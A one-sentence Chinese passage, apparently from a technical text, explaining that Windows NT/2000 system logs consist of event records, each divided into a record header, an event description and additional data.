NT/2000的系统日志由事件记录组成。每个事件记录为三个功能区:记录头区、事件描述区和附加数据区。